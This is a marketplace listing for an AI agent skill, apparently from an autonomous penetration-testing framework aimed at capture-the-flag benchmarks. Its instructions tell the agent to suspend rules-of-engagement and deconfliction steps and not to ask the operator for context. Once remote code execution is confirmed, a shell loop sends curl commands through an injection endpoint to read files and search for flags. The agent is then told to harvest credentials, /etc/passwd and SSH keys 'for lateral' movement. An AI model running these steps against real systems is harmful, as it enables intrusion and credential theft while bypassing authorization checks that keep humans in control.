AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified Apache-2.0 Self-run

Benchmark

skill-mingyiseclab-mingyi-atlas-benchmark · by MingyiSecLab

Benchmark mode marker — engagement objective is flag capture. Generic engagement rules apply unchanged.

— No reviews yet
0 installs
28 views
0.0% view→install

Install

$ agentstack add skill-mingyiseclab-mingyi-atlas-benchmark

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • ✓ Prompt-injection patterns
  • ✓ Secret / credential exfiltration
  • ✓ Dangerous shell & filesystem operations
  • ✓ Untrusted network calls
  • ✓ Known-malicious package signatures

What it can access

  • ● Network access Used
  • ✓ Filesystem access No
  • ✓ Shell / process execution No
  • ● Environment & secrets Used
  • ✓ Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-mingyiseclab-mingyi-atlas-benchmark)

Reliability & compatibility

✓ Security review passed
0 installs to date
— no reviews yet
● 3mo ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Benchmark? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

Benchmark Mode

The engagement objective is flag capture. Per-challenge context (target URL, vulnerability tags, flag format, mission brief, extra service ports) is injected into the system message every model call by EngagementContextMiddleware — read it; do NOT duplicate it here, and do NOT ask the operator for it.

Suspended CRITICAL_RULES under benchmark mode

  • Rule 8 (Startup Required) — flag IS the deliverable; no roe/conops/deconfliction.
  • Rule 9 (Final Report) — no executive summary; the flag string is the report.

All other CRITICAL_RULES remain active. Recon→exploit ordering, OPPLAN discipline, no-bash-in-orchestrator, tag routing, OPSEC, and budget pacing live in their owning prompts/skills (see atlas.md Rules 20/22, the recon/exploit agent prompts, and /skills/standard/exploit/web/SKILL.md for vuln routing).

SHORT-CIRCUIT — flag/credential found

When a sub-agent (recon or exploit) returns a verified flag or flag-equivalent credential:

  1. update_objective remaining objectives to passed.
  2. Your VERY NEXT response is the final answer, re-echoing the flag

VERBATIM in the format announced by the middleware (e.g. Flag captured: FLAG{}). The harness scans ONLY the orchestrator's final message — if the flag string lives only inside a sub-agent return, it is LOST.

Flag-path sweep (after RCE confirmed)

Generic skills under /skills/standard/exploit/web/ (command-injection/SKILL.md, cve/SKILL.md, etc.) cover credential/secret extraction but intentionally exclude CTF flag conventions. Once any RCE primitive is confirmed (id, hostname, or arbitrary file read), run this single batched sweep — do NOT issue one curl per path:

# CTF flag-path conventions — XBOW / picoCTF / HackTheBox / TryHackMe overlap.
for f in /opt/flag.txt /flag /flag.txt /root/flag.txt /root/flag \
         /home/*/flag.txt /home/*/flag /tmp/flag.txt /tmp/flag \
         /var/www/flag.txt /var/www/html/flag.txt /srv/flag.txt /srv/flag; do
  result=$(curl -s "http:///?cmd=cat+$f" 2>/dev/null | head -5)
  [ -n "$result" ] && echo "=== $f ===" && echo "$result"
done | tee /tmp/flag_sweep.txt
head -50 /tmp/flag_sweep.txt

# Broad flag-filename find (when path is non-standard)
curl -s "http:///?cmd=find+/+-type+f+\(-name+'flag*'-o+-name+'FLAG*'\)+-not+-path+'/proc/*'+-not+-path+'/sys/*'+2>/dev/null" \
  -o /tmp/find_flag.txt
head -20 /tmp/find_flag.txt

Replace ` with the confirmed injection endpoint. If the flag's format (e.g. FLAG{...}, flag{...}, CTF{...}`) was announced by the middleware, additionally grep the harvest for that prefix:

grep -hoE '(FLAG|flag|CTF)\{[^}]+\}' /tmp/flag_sweep.txt /tmp/find_flag.txt | sort -u

The generic credential harvest (/etc/passwd, .env, configs, SSH keys, secret/cred/token files) lives in /skills/standard/exploit/web/command-injection-exploitation/SKILL.md — run BOTH sweeps post-RCE; flag-path first (objective), credential second (lateral).

Tag → Skill Routing Table (BENCHMARK FAST-PATH)

Benchmark mode pre-declares Vulnerability tags: in the engagement context, leaking the challenge's intended attack class. In real engagements no such metadata exists — agents discover the class through the domain router skill applied to recon's raw observations. This table is the canonical fast-path for the benchmark shortcut and the only place this mapping lives. Generic agent prompts (recon.md, exploit.md, atlas.md) intentionally do not encode it — they route via the domain router skills (/skills/standard/exploit//SKILL.md) on observation evidence.

Consumer: the orchestrator (atlas.md). When dispatching exploit, the orchestrator may consult this table to pick the matching sub-skill directly from the pre-declared tags, skipping the observation-based router classification. Recon does NOT consume this table — recon's role is observation, not classification or skill recommendation.

| Vulnerability tag | Skill path | |---|---| | sqli | /skills/standard/exploit/web/sqli/SKILL.md | | blind_sqli | /skills/standard/exploit/web/blind-sqli/SKILL.md (load with /skills/standard/exploit/web/sqli/SKILL.md when sqlmap+tamper is exhausted) | | xss | /skills/standard/exploit/web/xss/SKILL.md | | ssti | /skills/standard/exploit/web/ssti-exploitation/SKILL.md | | ssrf | /skills/standard/exploit/web/ssrf-exploitation/SKILL.md | | xxe | /skills/standard/exploit/web/xxe-exploitation/SKILL.md | | lfi | /skills/standard/exploit/web/lfi/SKILL.md | | path_traversal | /skills/standard/exploit/web/lfi/SKILL.md | | command_injection | /skills/standard/exploit/web/command-injection-exploitation/SKILL.md | | insecure_deserialization | /skills/standard/exploit/web/deserialization-exploitation/SKILL.md | | idor | /skills/standard/exploit/web/idor-exploitation/SKILL.md | | arbitrary_file_upload | /skills/standard/exploit/web/file-upload/SKILL.md | | file_upload | /skills/standard/exploit/web/file-upload/SKILL.md | | graphql | /skills/standard/exploit/web/graphql/SKILL.md | | race_condition | /skills/standard/exploit/web/race-condition/SKILL.md | | smuggling | /skills/standard/exploit/web/smuggling/SKILL.md | | crypto | /skills/standard/exploit/web/web-crypto-exploitation/SKILL.md | | business_logic | /skills/standard/exploit/web/business-logic/SKILL.md | | default_credentials | /skills/standard/exploit/web/business-logic/SKILL.md | | jwt | /skills/standard/exploit/web/jwt/SKILL.md | | cve | /skills/standard/exploit/web/cve/SKILL.md |

For multiple tags → emit one REQUIRED SKILL LOAD: line per mapped skill.

What this skill is NOT

  • vulnerability routing → /skills/standard/exploit/{web,ad}/SKILL.md
  • recon playbooks → /skills/standard/recon//SKILL.md
  • OPSEC → /skills/shared/opsec/SKILL.md
  • per-challenge context → middleware-injected, every turn
  • agent-specific behavior → that agent's prompt and /skills//

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.